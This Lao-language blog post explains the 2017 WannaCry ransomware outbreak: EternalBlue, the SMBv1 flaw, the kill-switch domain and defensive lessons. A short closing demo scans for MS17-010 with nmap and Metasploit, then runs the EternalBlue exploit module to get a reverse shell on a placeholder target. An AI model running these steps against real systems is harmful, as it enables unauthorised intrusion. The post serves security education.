Cyber ສີແຂ້ວລະຕີ໋ Case Files Ep. 1: WannaCry ransomware attack

We can always learn from the past, so let’s take a look at some of history’s biggest cyber attacks!

JocKKy
LaoHacker
4 min readJan 15, 2024

--

Introduction:

Cyber ສີແຂ້ວລະຕີ໋ Case Files ເປັນ Series ບົດຄວາມທີ່ຈະນຳເອົາ CyberAttacks Case ທີ່ເກີດຂຶ້ນໃນອະດີດມາເລົ່າແບບ Case by Case ວ່າມັນເກີດຂຶ້ນໄດ້ແນວໃດ? ຍ້ອນຫຍັງ? ແລະ ເຮົາສາມາດຮຽນຮູ້ຫຍັງຈາກເຫດການເຫຼົ່ານັ້ນໄດ້ແດ່… ໂດຍຈະເປັນການຂຽນເລົ່າໃນມຸມມອງຂອງ Newbie Cyber Security Learner ຫຼື ກໍຄື ໂຕຂ້ອຍ…ທີ່ວ່າງ ບວກກັບ ບໍ່ຮູ້ຈະເຮັດດີ… ນັ້ນເອງ…

Welcome to Cyber ສີແຂ້ວລະຕີ໋ Case Files: The Seriesssss! and This is Ep.1: WannaCry ransomware attack!… UwU

ພາບປາກອບ For ເຮັດພາບໜ້າປົກ https://www.rand.org/content/rand/pubs/commentary/2017/05/wannacry-virus-a-lesson-in-global-unpreparedness/_jcr_content/par/blogpost.crop.868x455.lm.jpeg/1495481445334.jpeg

Let sa gooooo:

ຍ້ອນກັບໄປໃນວັນທີ່ 12 ພຶດສະພາ ປີ 2017 ໄດ້ເກີດເຫດການທີ່ຄອມພິວເຕິທົ່ວໂລກຖືກໂຈມຕີ(Hack) ໃນເວລາໄລ່ເລ່ຍກັນໂດຍ Ransomware(ໄວຮັສເອີ້ນຄ່າໄຖ່) ທີ່ຊື່ວ່າ WannaCry

https://upload.wikimedia.org/wikipedia/en/1/18/Wana_Decrypt0r_screenshot.png

WannaCry ແມ່ນຫຍັງ?

WannaCry ຫຼື WannaCrypt ຫຼື Wana Decrypt0r ແມ່ນໄວຮັສເອີ້ນຄ່າໄຖ່ໂຕໜຶ່ງທີ່ມີເປົ້າໝາຍເປັນລະບົບປະຕິບັດການ Microsoft Windows, ແຜ່ກະຈາຍໃນຮູບແບບ Worm(malware ຊະນິດໜຶ່ງ) ຜ່ານຊ່ອງໂຫວ່ Eternal Blue (MS17–010, CVE-2017–0144) ເຊິ່ງເປັນຊ່ອງໂຫວ່ທີ່ຖືກພັດທະນາໂດຍ United States National Security Agency (NSA) ສຳຫຼັບໃຊ້ກັບລະບົບ Windows EternalBlue ຂອງໂຕເອງ (ແຕ່ສາມາດເອົາມາໃຊ້ກັບ Protocol SMBv1 ໃນລະບົບປະຕິບັດການ Windows ທົ່ວໄປໃຫ້ສາມາດເຮັດ Remote Code Execution ໄດ້), ແຕ່ຂໍ້ມູນຮົ່ວໄຫລ(ຖືກລັກ) ໜຶ່ງເດືອນກ່ອນເກີດເຫດການໂຈມຕີ ໂດຍເປັນຝີມືຂອງກຸ່ມ Hacker ທີ່ຊື່ວ່າ The Shadow Brokers.

- Worm ແມ່ນ malware ຊະນິດໜຶ່ງທີ່ຖືກອອກແບບມາໃຫ້ສາມາດແຜ່ກະຈາຍຕົວເອງຈາກຄອມພິວເຕີເຄື່ອງໜຶ່ງໄປອີກເຄື່ອງໜຶ່ງໄດ້ ໂດຍການແຜ່ກະຈາຍຂອງມັນຈະເປັນການ copy ໂຕເອງ ແລະ ກະຈາຍໂຕຂ້າມ network ເຊັ່ນ: ລະບົບເຄືອຄ່າຍ, ອິນເຕີເນັດເປັນຕົ້ນ.

- RCE ຫຼື ຊື່ເຕັມແມ່ນ Remote Code Execution ແມ່ນການ Run Code ຈາກໄລຍະໄກ ຫຼື ສັ່ງໃຫ້ Code ເຮັດວຽກຈາກໄລຍະໄກໄດ້ໂດຍທີ່ເຮົາບໍ່ຈຳເປັນຕ້ອງຢູ່ໜ້າຈໍຄອມເຄື່ອງນັ້ນ.

ພາບເຫດການໃນລະຫວ່າງເກີດເຫດ: Windows ແຕກ, Linux ລອດ

ສາເຫດການໂຈມຕີ Eternal Blue ເກີດຈາກຊ່ອງໂຫວ່ຂອງໂຕຈັດການ Protocol SMB version 1 ຂອງ Windows ທີ່ໃຊ້ມາຕັ້ງແຕ່ Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 ຈົນຮອດ Windows 2016 ຫຼື ສາມາດເວົ້າໄດ້ວ່າຊ່ອງໂຫວ່ໂຕນີ້ສາມາດ Hack ເຄື່ອງ Windows ໄດ້ແທບທຸກເຄື່ອງໂດຍມີເງື່ອນໄຂວ່າເຄື່ອງນັ້ນຕ້ອງໃຊ້ງານ SMB version 1 (SMBv1) ຢູ່ (ເຊິ່ງປົກກະຕິທຸກເຄື່ອງທີ່ໄດ້ເຊື່ອມຕໍ່ກັບອິນເຕີເນັດໃນເວລານັ້ນເປີດໄວ້ໂດຍ Default ຢູ່ແລ້ວ).

SMB ຫຼື Server Message Block ແມ່ນ network protocol ໂຕໜຶ່ງທີ່ໃຊ້ເພື່ອຮັບ-ສົ່ງໄຟລ໌ຈາກຄອມພິວເຕີໄປຫາ device ໃດໜຶ່ງເຊັ່ນ: ສົ່ງໄຟລ໌ລະຫວ່າງຄອມພິວເຕີດ້ວຍກັນເອງ, ສົ່ງໄຟລ໌ລະຫວ່າງຄອມພິວເຕີຫາ printer ເປັນຕົ້ນ, ໂດຍທົ່ວໄປ SMB ຈະໃຊ້ port 139 ຫຼື 445 ເປັນ default port. ປັດຈຸບັນ SMB ມີທັງໝົດ 3 versions ຄື: SMB verion 1 (SMBv1) ທີ່ມີຊ່ອງໂຫວ່ເຊິ່ງປັດຈຸບັນໄດ້ຍົກເລີກໃຊ້ງານ version 1 ນີ້ໄປແລ້ວ, SMB version 2 (SMBv2) ແລະ SMB version 3 (SMBv3).

ເຫດການຄັ້ງນີ້ສາມາດເວົ້າໄດ້ວ່າເປັນເຫດການສະເທືອນໂລກໃນຕອນນັ້ນເລີຍກໍວ່າໄດ້, ເຊິ່ງເຫດການດັ່ງກ່າວໄດ້ສົ່ງຜົນກະທົບໄປທົ່ວໂລກ ໃນເວລາພຽງ 4 ມື້ຫຼັງເກີດເຫດ ກໍໄດ້ເຮັດໃຫ້ຄອມພິວເຕີທົ່ວໂລກຕິດໄວຮັສໂຕເອີ້ນຄ່າໄຖ່ໂຕນີ້ໄປຈຳນວນຫຼາຍກວ່າ 300000 ເຄື່ອງ ໃນ 150 ກວ່າປະເທດ, ໂດຍຄວາມສາມາດຫຼັກໆຂອງໄວຮັສໂຕນີ້ຈະເຮັດໃຫ້ໜ້າຈໍຄອມປ່ຽນເປັນສີແດງ ແລະ ເຂົ້າລະຫັດ(Encrypt)ໄຟລ໌ພາຍໃນເຄື່ອງຂອງເຫຍື່ອໃຫ້ບໍ່ສາມາດເຂົ້າໃຊ້ຂໍ້ມູນເຫຼົ່ານັ້ນໄດ້ ແລະ ມີຂໍ້ຄວາມຂົ່ມຂູ່ເຫຍື່ອປະມານວ່າໃຫ້ຈ່າຍຄ່າໄຖ່ເປັນເງິນຈຳນວນ $300-$600+ (via bitcoin) ເພື່ອແລກກັບ Key ທີ່ໃຊ້ໃນການຖອດລະຫັດໄຟລ໌ ແລະ ຖ້າບໍ່ຈ່າຍພາຍໃນ 3 ມື້ໄຟລ໌ທີ່ຖືກເຂົ້າລະຫັດທັງໝົດຈະຖືກລົບຖິ້ມອັດຕະໂນມັດ, ໂດຍເຫດການນີ້ໄດ້ສ້າງຄວາມເສຍຫາຍລວມທັງໝົດຕັ້ງແຕ່ຫຼັກຫຼາຍຮ້ອຍລ້ານ($100millions)ໄປຈົນຮອດຫຼັກພັນລ້ານໂດລາສະຫະລັດ($1000millions) ໃນເວລານັ້ນ.

ພາບບັນດາ 150 ປະເທດໃນໂລກທີ່ຖືກ WannaCry Ransomware ໂຈມຕີ… “ແມ່ນແລ້ວປະເທດລາວເຮົາລອດເພາະ Security ຂອງປະເທດເຮົາປອດໄພລະດັບ Paper” https://www.benthamsgaze.org/wp-content/uploads/2017/05/Countries_initially_affected_in_WannaCry_ransomware_attack.png

ສະຫຼຸບຮູບແບບ ແລະ ການເຮັດວຽກຂອງ Ransomware

  • Ransomware ຈະທຳການຢຶດເຄື່ອງຄອມພິວເຕີ ແລະ ໄຟລ໌ຕ່າງໆດ້ວຍວິທີການເຂົ້າລະຫັດ(Encrypt) ໂດຍໃຊ້ເທັກນິກຂັ້ນສູງທີ່ບໍ່ສາມາດຖອດລະຫັດໄດ້ຖ້າບໍ່ມີ key ຫຼື ອາດຈະຖອດໄດ້ແຕ່ຕ້ອງຈະໃຊ້ເວລາຫຼັກ 1–100ປີ ຂຶ້ນໄປ.

Encrypt ແມ່ນການເຂົ້າລະຫັດໂດຍໃຊ້ Key

  • ຜູ້ທີ່ຕົກເປັນຫຍື່ອຈະຕ້ອງຈ່າຍເງິນເພື່ອແລກກັບ Key ສຳຫຼັບການຖອດລະຫັດ (Decryption Key)
  • ໃຊ້ຫຼາກຫຼາຍວິທີເພື່ອກົດດັນໃຫ້ເຫຍື່ອຍິມຍອມຈ່າຍຄ່າໄຖ່ເພື່ອໃຫ້ໄດ້ຂໍ້ມູນຂອງຕົນຄືນມາ, ຖ້າບໍ່ຈ່າຍພາຍໃນເວລາທີ່ກຳນົດຂໍ້ມູນຈະຖືກລົບອັດຕະໂນມັດ

ໃນປັດຈຸບັນປີ 2024 ຈາກກໍລະນີສຶກສາທີ່ເປີດເຜີຍສູ່ສາທາລະນະກ່ຽວກັບ Ransomware ທີ່ເກີດຂຶ້ນ ມີທັງຍອມຈ່າຍຄ່າໄຖ່ແລ້ວໄດ້ຂໍ້ມູນຄືນ ແລະ ຈ່າຍໄປແລ້ວບໍ່ໄດ້ຄືນ, ເຊິ່ງນັ້ນໝາຍຄວາມວ່າບໍ່ມີຫຍັງມາກາລັນຕີໄດ້ເລີຍວ່າຈະໄດ້ຂໍ້ມູນຄືນຖ້າຫາກຈ່າຍຄ່າໄຖ່ (ເພາະສະນັ້ນ Do at you own risk).

ການໂຈມຕີຂອງ WannaCry ຢຸດລົງໄດ້ແນວໃດ?

ໃນມື້ທີ່ 1 ທີ່ເກີດເຫດການໂຈມຕີ, ໄດ້ມີ Cyber Security Researcher ທ່ານໜຶ່ງຊື່ວ່າ Marcus Hutchins ໄດ້ເຮັດ Reverse-Engineering(ວິສະວະກຳຍ້ອນກັບ) ກັບ WannaCry source code, ລາວໄດ້ຄົ້ນພົບວ່າ WannaCry ມີຟັງຊັ່ນໜຶ່ງທີ່ກ່ອນໂຕໄວຮັສຈະເລີ່ມເຮັດວຽກ ມັນຈະໄປ query domain ໂຕໜຶ່ງຄື iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com ກ່ອນ, ແຕ່ພໍລາວໄປລອງເຂົ້າພັດປາກົດວ່າບໍ່ພົບເວັບໄຊ້ນີ້

ລາວກໍເລີຍລອງຊື້ domain ໂຕນີ້ດ້ວຍລາຄາ $10.69

ຫຼັງຈາກນັ້ນ, ໄວຮັສ WannaCry ຍັງຄົງແຜ່ກະຈາຍຕໍ່, ແຕ່ຈະບໍ່ເຮັດວຽກ (execute) ຄືກ່ອນໜ້າ, Marcus Hutchins ໄດ້ສັນນິຖານວ່າໄວຮັສ WannaCry ຈະ query ບາງຢ່າງໄປຍັງ domain iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comນີ້ກ່ອນຖ້າໄດ້ຮັບ response ກັບມາຈັ່ງເລີ່ມເຮັດວຽກ

ຈາກຂໍ້ສັນນິຖານຂ້າງເທິງຕ້ອງໝາຍຄວາມວ່າເຄື່ອງທີ່ຈະຕິດໄວຮັສໄດ້ຕ້ອງໄດ້ເຊື່ອມຕໍ່ກັບອິນເຕີເນັດ ແຕ່ພັດມີເຄື່ອງທີ່ບໍ່ໄດ້ເຊື່ອມອິນເຕີເນັດທີ່ຕິດໄວຮັສຢູ່ ເລີຍໄດ້ມີການເອົາຂໍ້ສັນນິຖານນີ້ມາສືບຕໍ່ວິໄຈຫາສາເຫດ ໂດຍໄດ້ຂໍ້ສະຫຼຸບວ່າ: ໄວຮັສໂຕນີ້ໄດ້ເຮັດບາງຢ່າງກັບເຄື່ອງຄອມພິວເຕີໃຫ້ generate domain ປອມຂຶ້ນມາໃນເຄື່ອງເພື່ອໃຫ້ຟັງຊັ່ນ query ສາມາດສັ່ງໃຫ້ໄວຮັສເລີ່ມເຮັດວຽກເພື່ອຢຶດເຄື່ອງເປົ້າໝາຍ.

ບໍວ່າຈະດ້ວຍເຫດຜົນໃດກໍຕາມ, ການກະທຳດັ່ງກ່າວກໍໄດ້ຊ່ວຍເຮັດໃຫ້ຄອມພິວເຕີ ແລະ ເຄືອຄ່າຍທົ່ວໂລກຢຸດຕິດໄວຮັສຊະນິດນີ້ເພີ່ມຂຶ້ນໄດ້.

ເກີດຫຍັງຂຶ້ນກັບ Marcus Hutchins ຫຼັງເຫດການ WannaCry?

ກ່ອນທີ່ Marcus Hutchins ຈະມາເປັນ Security Researcher, ລາວເຄີຍເປັນຄົນຂຽນ-ພັດທະນາ ແລະ ຂາຍ malware ໃນ dark web ມາກ່ອນ, ຫຼັງຈາກເຫດການ WannaCry ຈົບໄປໄດ້ບໍ່ດົນ FBI ກໍໄດ້ບຸກ ແລະ ຈັບກຸມ Marcus Hutchins ທີ່ Las Vegas, Nevada ເດົາວ່າສາເຫດການຈັບກຸມມາຈາກການກະທຳທີ່ລາວໄດ້ເຮັດໄປໃນອະດີດ ແລະ ຕຳນານຂອງຊາຍທີ່ຄັ້ງໜຶ່ງເຄີຍຊ່ວຍໂລກອິນເຕີເນັດໄວ້ ກໍໄດ້ງຽບໄປ.

WannaCry Ransomware ໃນປັດຈຸບັນ?

WannaCry ທີ່ຖືກໃຊ້ໂຈມຕີ Version ທຳອິດແມ່ນ ຈະບໍ່ສາມາດຫຍັງເຮັດຫຍັງໄດ້ແລ້ວໃນປັດຈຸບັນ ຫຼັງຈາກທີ່ຖືກ Kill switch domain ໂດຍ Marcus Hutchins ແລະ Microsoft ກໍໄດ້ອອກ Windows Update ເວີຊັ່ນ patch ຊ່ອງໂຫວ່ EternalBlue ໃນເວລາຕໍ່ມາຫຼັງເກີດເຫດ, ແຕ່ເຖິງແນວໃດກໍ່ຕາມ ຍັງມີຄອມພິວເຕີຫຼາຍເຄື່ອງທີ່ຍັງໃຊ້ Windows ເວີຊັ່ນເກົ່າຢູ່ ເລີຍເຮັດໃຫ້ຍັງມີການຖືກໂຈມຕີຕໍ່ຈົນຮອດລ່າສຸດໃນເດືອນ ມີນາ 2021 ກໍຍັງຄົງມີລາຍງານວ່າຍັງມີຄອມພິວເຕີ Windows ທີ່ບໍ່ຍອມອັບເດດ ແລະ ຖືກໂຈມຕີໂດຍ WannaCry ທີ່ໃຊ້ຊ່ອງໂຫວ່ EternalBlue ຢູ່.

Ransomware ສາມາດໂຈມຕີເຮົາໄດ້ທາງໃດແດ່?

  • ໄຟລ໌ attachment ທີ່ແນບມາກັບ Email: ສ່ວນໃຫຍ່ຈະມາໃນຮູບແບບໄຟລ໌ທີ່ເປັນນາມສະກຸນ .doc, .zip, .pdf... ແຕ່ຄວາມຈິງແລ້ວເປັນໄຟລ໌ປອມທີ່ພາຍໃນເປັນໄຟລ໌ .exe ທີ່ຫຼັງຈາກເປີດໃຊ້ງານຈະ Run ໄວຮັສ/Ransomware ໃຫ້ເຮັດວຽກ
  • ການເປີດ Website/Link/Download ໄຟລ໌ທີ່ບໍ່ຮູ້ແຫຼ່ງທີ່ມາ
  • ການໃຊ້ Software ທີ່ Outdated
  • ຕາມໂຄສະນາໃນເວັບໄຊ້ທີ່ບໍ່ໜ້າເຊື່ອຖືຕ່າງໆ ທີ່ອາດຈະແຝງໄວຮັສ

ສາທິດການໂຈມຕີໂດຍໃຊ້ຊ່ອງໂຫວ່ EternalBlue:

ທຳອິດກວດສອບກ່ອນວ່າເຄື່ອງເປົ້າໝາຍມີຊ່ອງໂຫວ່ EternalBlue ຫຼື ບໍ ໂດຍສາມາໃຊ້ໄດ້ຫຼາຍວິທີ ແຕ່ໃນການສາທິດນີ້ຈະໃຊ້ເຄື່ອງມື nmap ແລະ metasploit ຜ່ານ Kali-Linux

1. nmap

sudo nmap -Pn -n -p 445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 <Target_IP>
ສັງເກດໃນຮູບຈະເຫັນວ່າເປົ້າໝາຍມີຊ່ອງໂຫວ່ EternalBlue

2. metasploit:

  • ເປີດໃຊ້ງານໂດຍໃຊ້ຄຳສັ່ງ:
sudo msfconsole
  • ເລືອກ Module ແລະ ໃຊ້ງານ:
use auxiliary/scanner/smb/smb_ms17_010

set RHOSTS <target_ip>

exploit
ສັງເກດໃນຮູບຈະເຫັນວ່າເປົ້າໝາຍມີຊ່ອງໂຫວ່ EternalBlue

Exploit ໂດຍໃຊ້ metasploit:

  • search ຫາ payload ທີ່ຈະເອົາມາໃຊ້ໃນການໂຈມຕີ
search eternal
  • ເລືອກ payload ທີ່ຕ້ອງການໃຊ້
use 1
  • set RHOSTS ໝາຍເຖິງ set ໄອພີເຄື່ອງເປົ້າໝາຍ
set <target_ip>
  • set LHOST ໝາຍເຖິງ set ໄອພີເຄື່ອງເຮົາທີ່ຈະໃຊ້ໂຈມຕີເພື່ອເຮັດ reverse shell ແລ້ວຕາມດ້ວຍ exploit ເພື່ອສັ່ງ run ການໂຈມຕີ
set <our_machine_ip>

exploit

ແລະ ເຮົາກໍຈະໄດ້ shell ມາ ເຊິ່ງໝາຍຄວາມວ່າເຮົາໂຈມຕີສຳເລັດແລ້ວນັ້ນເອງ.

ສະຫຼຸບສິ່ງທີ່ໄດ້ຮຽນຮູ້ຈາກເຫດການນີ້:

  • ໝັ່ນຕິດຕາມຂ່າວ ແລະ ອັບເດດຊອບແວໃຫ້ເປັນເວີຊັ່ນລ່າສຸດຢູ່ສະເໝີ
  • ຄວນວາງແຜນເພື່ອໄວ້ວ່າຖ້າຫາກເກີດເຫດແລ້ວເຮົາຄວນ response ແນວໃດຕໍ່ເຫດການນັ້ນ ເຊັ່ນ: ຕັດການເຊື່ອມຕໍ່ network ໃນເຄືອດຽວກັນເພື່ອກັນບໍ່ໃຫ້ການໂຈມຕີແຜ່ກະຈາຍເປັນຕົ້ນ.
  • ຄວນ backup ຂໍ້ມູນໄວ້ສຳຫຼັບກໍລະນີສຸກເສີນ ເຊັ່ນ: ໃນກໍລະນີທີ່ຮ້າຍແຮງທີ່ສຸດຄືຄອມພິວເຕີຂອງເຮົາ ຫຼື ຂອງອົງກອນຕິດໄວຮັສ Ransomware ໄປແລ້ວ ເຮົາບໍ່ສາມາດເຮັດຫຍັງໄດ້ນອກຈາກຈ່າຍຄ່າໄຖ່ເພື່ອແລກກັບ key ເພື່ອມາຖອດລະຫັດໄຟລ໌, ແຕ່ຖ້າຫາກວ່າໄດ້ມີການ backup ຂໍ້ມູນໄວ້ເຮົາຍັງສາມາດກູ້ ຫຼື Restore ຂໍ້ມູນໃຫ້ກັບມາໃຊ້ງານໄດ້ຕາມປົກກະຕິ.

ແລະ ສຸດທ້າຍນີ້ຕ້ອງຂໍຂອບໃຈທຸກຄົນທີ່ອ່ານມາຈົນຈົບ, ຫວັງວ່າທຸກຄົນຈະໄດ້ຄວາມຮູ້ ແລະ ໄດ້ຕະນັກຮູ້ວ່າໄພທາງໄຊເບີນັ້ນອັນຕະລາຍຂະໜາດໃດ ເພາະເຮົາບໍ່ສາມາດຮູ້ໄດ້ເລີຍວ່າເຮົາຊິຖືກ Hack ຫຼື ຖືກໂຈມຕີຕອນໃດ ແລະ ທາງໃດ, ດັ່ງນັ້ນເຮົາຄວນຈັດລຳດັບຄວາມສຳຄັນ ແລະ ເພີ່ມມາດຕະການປ້ອງກັນເພື່ອຫຼຸດຜົນກະທົບຂອງໄພຄຸກຄາມທາງໄຊເບີທີ່ອາດຈະເກີດຂຶ້ນກັບເຮົາໃນອານາຄົດເຊັ່ນ: ຄວນຫຼີກຫຼ້ຽງການໃຊ້ຊອບແວເຖື່ອນ(Cracked Software), ຄວນກວດສອບ link ຫຼື file ກ່ອນເປີດ, ບໍ່ໃຊ້ອິນເຕີເນັດສາທາລະນະມົ່ວຊົ່ວ, ຄວນອັບເດດຊອບແວເປັນປະຈຳ…

ຫຼື ໂຕເລືອກທີ່ດີທີ່ສຸດຄວນທີ່ຈະໄປປຶກສາ ແລະ ໃຊ້ບໍລິການບໍລິສັດທີ່ມີຄວາມສ່ຽວສານໃນສາຍວຽກນີ້ໂດຍຕົງເຊັ່ນ: ບໍລິສັດ Cyberus Technologies ທີ່ມີບໍລິການດ້ານຄວາມປອດໄພທີ່ຫຼາກຫຼາຍໃຫ້ແກ່ລູກຄ້າເຊັ່ນ: ທົດສອບເຈາະລະບົບ(Penetration Testing), ສຶກສາ ແລະ ຊອກຫາຈຸດອ່ອນໃນ code (Source Code Review), ທີ່ປຶກສາດ້ານຄວາມປອດໄພຊ່ວຍແນະນຳຕັ້ງແຕ່ design ຈົນ release ລະບົບ (Security Consultancy), ຊ່ວຍພັດທະນາບຸກຄະລາກອນທັງ non-technical ແລະ technical ດ້ານຄວາມປອດໄພ (CyberSecurity Training), ຊ່ວຍສ້າງ Security Policy ເພື່ອຂໍມາດຕະຖານລະດັບສາກົນຕ່າງໆເຊັ່ນ PCI-DSS, ISO 27001 (Compliance Advisory), Incident Response ແລະ ອື່ນໆ…

ແລ້ວເຈີກັນໃນ Ep. 2 (ຖ້າມີ). UwU~

--

--

JocKKy
LaoHacker

HELLO!! THIS is JOCKKY!, HE is a boy who REALLY LOVEs Drinking MILK... || Discord: jockky